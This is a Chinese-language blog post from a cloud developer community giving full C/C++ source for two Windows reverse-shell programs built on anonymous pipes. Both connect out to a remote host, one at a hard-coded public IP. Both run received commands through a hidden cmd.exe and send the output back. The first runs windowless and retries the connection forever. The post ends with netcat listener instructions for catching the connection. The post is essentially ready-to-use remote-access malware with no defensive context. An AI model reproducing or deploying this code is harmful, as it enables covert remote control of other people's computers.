前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >C/C++ 匿名管道反弹CMDShell

C/C++ 匿名管道反弹CMDShell

作者头像
微软技术分享
发布2022-12-28 13:42:43
5850
发布2022-12-28 13:42:43
代码语言:javascript
复制
#pragma comment(lib,"ws2_32.lib")
#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#endif

#include <winsock2.h>
#include <windows.h>

int main(int argc, char **argv)
{
    char *messages = "======================== Connect successful !========================\n";
    WSADATA WSAData;
    SOCKET sock; //创建套接字
    SOCKADDR_IN addr_in;
    char buf[1024]; //buf作为socket接收数据的缓冲区
    memset(buf, 0, 1024); //清空缓冲区

    WSAStartup(MAKEWORD(2, 2), &WSAData); //初始化ws2

    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(80); //反向连接的远端主机端口
    addr_in.sin_addr.S_un.S_addr = inet_addr("59.110.167.239"); //远端IP

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    while (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in), NULL, NULL, NULL, NULL) == SOCKET_ERROR) //连接客户主机
    {
        Sleep(5000); //连接失败,停顿5s,再试
        continue;
    }

    send(sock, messages, strlen(messages), 0); //发送success信息

    char buffer[2048] = { 0 };//管道输出的数据

    for (char cmdline[270];; memset(cmdline, 0, sizeof(cmdline))){
        SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
        HANDLE hRead, hWrite;
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.lpSecurityDescriptor = NULL;
        sa.bInheritHandle = TRUE;

        CreatePipe(&hRead, &hWrite, &sa, 0); //创建管道

        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        si.cb = sizeof(STARTUPINFO);
        GetStartupInfo(&si); //STARTUPINFO 结构
        si.hStdError = hWrite;
        si.hStdOutput = hWrite;
        si.wShowWindow = SW_HIDE; //隐藏窗口
        si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

        GetSystemDirectory(cmdline, MAX_PATH + 1); //获得系统路径
        strcat(cmdline, "//cmd.exe /c"); //路径+/cmd.exe

        int len = recv(sock, buf, 1024, NULL);
        if (len == SOCKET_ERROR) exit(0); //如果客户端断开连接,则自动退出程序

        strncat(cmdline, buf, strlen(buf)); //把命令参数复制到cmdline
        CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi); //创建进程

        CloseHandle(hWrite);

        for (DWORD bytesRead; ReadFile(hRead, buffer, 2048, &bytesRead, NULL); //循环读取管道中数据并发送,直到管道中没有数据为止
            memset(buffer, 0, 2048)){
            send(sock, buffer, strlen(buffer), 0);
        }
    }
    return 0;
}
代码语言:javascript
复制
#include <Windows.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

HANDLE g_hinputPipe, g_houtputPipe;
HANDLE g_hThread;
DWORD g_dwThreadId;
const unsigned short PORT = 4900;
const char * REMOTE_ADDR = "127.0.0.1";
const unsigned int MAXSTR = 255;

//收发信息
bool sendData(SOCKET sSock, char *cmdline, const char* sockData)
{
    ZeroMemory(cmdline, MAXSTR);
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;
    while (!CreatePipe(&g_houtputPipe, &g_hinputPipe, &sa, 0))
    {
        Sleep(1000);
    }
    Sleep(200);
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    GetStartupInfo(&si);
    si.hStdError = g_hinputPipe;
    si.hStdOutput = g_hinputPipe;
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    GetSystemDirectory(cmdline, MAXSTR);
    strcat_s(cmdline, MAXSTR, "\\cmd.exe /c ");
    strcat_s(cmdline, MAXSTR, sockData);
    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))
    {
        Sleep(1000);
    }
    WaitForSingleObject(pi.hProcess, 10000);
    return true;
}

//被控端管道信息回传监控
DWORD WINAPI WatchData(LPVOID lprarm)
{
    unsigned int g_Ret = 0;
    DWORD dwTotalAvail = 0;
    DWORD realReadLen = 0;
    char readBuffer[4096] = "\0";
    SOCKET sSock = (SOCKET)lprarm;
    while (true)
    {
        g_Ret = PeekNamedPipe(g_houtputPipe, NULL, 0, NULL, &dwTotalAvail, NULL);
        if (g_Ret && dwTotalAvail > 0)
        {
            Sleep(300);
            g_Ret = ReadFile(g_houtputPipe, readBuffer, 4096, &realReadLen, NULL);
            if (g_Ret && realReadLen > 0)
            {
                Sleep(200);
                strcat_s(readBuffer, 4096, "\r\nCMD >");
                send(sSock, readBuffer, strlen(readBuffer), 0);
                ZeroMemory(readBuffer, 4096);
            }
        }
    }
    return 0;
}

//主函数
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    char sendError[30] = "[*] Send Error !\r\n\r\n";
    char cmdline[MAXSTR] = "\0";
    char sockData[MAXSTR] = "\0";
    int sockDataLen = 0;
    SOCKET sSock;
    sockaddr_in sockAddr;
    WSADATA wsd;
    if (WSAStartup(MAKEWORD(2, 2), &wsd)) return 0;
    if ((sSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return 0;
    sockAddr.sin_addr.S_un.S_addr = inet_addr(REMOTE_ADDR);
    sockAddr.sin_family = AF_INET;
    sockAddr.sin_port = htons(PORT);
    while (connect(sSock, (sockaddr*)&sockAddr, sizeof(sockAddr)) == SOCKET_ERROR)
    {
        Sleep(2000);
        continue;
    }

    g_hThread = CreateThread(NULL, 0, WatchData, LPVOID(sSock), 0, &g_dwThreadId);
    while (true)
    {
        while ((sockDataLen = recv(sSock, sockData, MAXSTR, 0)) == SOCKET_ERROR)
        {
            Sleep(1000);
        }
        if (!sendData(sSock, cmdline, sockData))
        {
            send(sSock, sendError, strlen(sendError), 0);
        }
        ZeroMemory(sockData, MAXSTR);
    }

    WaitForSingleObject(g_hThread, INFINITE);
    CloseHandle(g_hinputPipe);
    CloseHandle(g_houtputPipe);
    closesocket(sSock);
    WSACleanup();
    ExitProcess(0);
    return 0;
}

下载NC https://eternallybored.org/misc/netcat/

nc执行命令:nc命令 : -l -v -p [端口] 等待上线

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-06-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档